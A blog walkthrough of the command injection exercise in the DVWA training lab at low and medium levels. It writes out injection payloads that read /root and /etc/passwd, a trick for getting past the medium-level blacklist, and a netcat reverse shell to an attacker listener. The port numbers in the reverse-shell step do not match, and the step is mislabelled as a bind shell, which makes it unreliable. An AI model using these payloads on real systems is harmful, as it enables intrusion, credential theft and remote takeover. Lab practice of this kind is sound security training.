Home > DVWA > DVWA: Damn Vulnerable Web Application Command Execution solutions (Low & Medium)

DVWA: Damn Vulnerable Web Application Command Execution solutions (Low & Medium)

January 27, 2023

Command Execution or Command injection is an attack in which the goal is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.


"Disclaimer: The information provided in this article is intended for educational and research purposes only. It is not intended to promote or encourage any illegal or unethical activities. Always act responsibly and obtain proper consent before using any tools or techniques described in this article."

 



  • Low

DVWA Security > Script Security > Low > Submit

If we check the source code for low :


From the source code above you can input a random integer or any character instead of the IP Address, The system did not validate user input so that you can input anything. You can use any operator (meta-characters) to trick the shell into executing arbitrary commands.

As the code does not check if the $target matches an IP Address. No filtering on special characters. 

; in Unix/Linux allows for commands to be separated.


10.0.2.5; ls -la /root - list all the files in the root directory


After the shell executes “10.0.2.5;” the shell will execute this ls -la /root afterward, because the shell thinks it was still 10.0.2.5; shell command.

Alternatives to ;

  1.  && - AND Operator 
  2. | - PIPE Operator. 

 Medium

DVWA Security > Script Security > Medium > Submit

Viewing source code:


we see that a blacklist has been set to exclude && and ;.

 As noted above, we can use | as a replacement:

10.0.2.5| cat /etc/passwd. Double || can also be used,



 

Bind Shell

Run nc -lvp 12346  in your own Linux terminal. It will create a netcat listener.



now run 10.0.2.5;nc.traditional -e /bin/bash 10.0.2.4 12345 in DVWA command injection and click submit.

Now you have a reverse connection established with the server.

Points to note:

  1. Ensure you are using commands specific to the target you are trying to attack, all of the above are Linux, and Windows commands will be different.
  2. Try commands with and without a space between them
  3. You will not always have access to the source code.

The walkthrough for high security will follow soon.

If you got stuck or have any questions, leave a comment, and I’ll do my best to get back to you.

Post a Comment

No comments

Thank you for taking the time to leave a comment on my blog. I appreciate your feedback and contribution to the conversation on my blog. Your comment will be automatically approved and visible to other readers. Please note that while I encourage open and respectful dialogue, my team reserves the right to review and remove any comments that violate this blog's terms and conditions, or are considered to be spam or offensive.

Subscribe to: Post Comments ( Atom )
Powered by Blogger.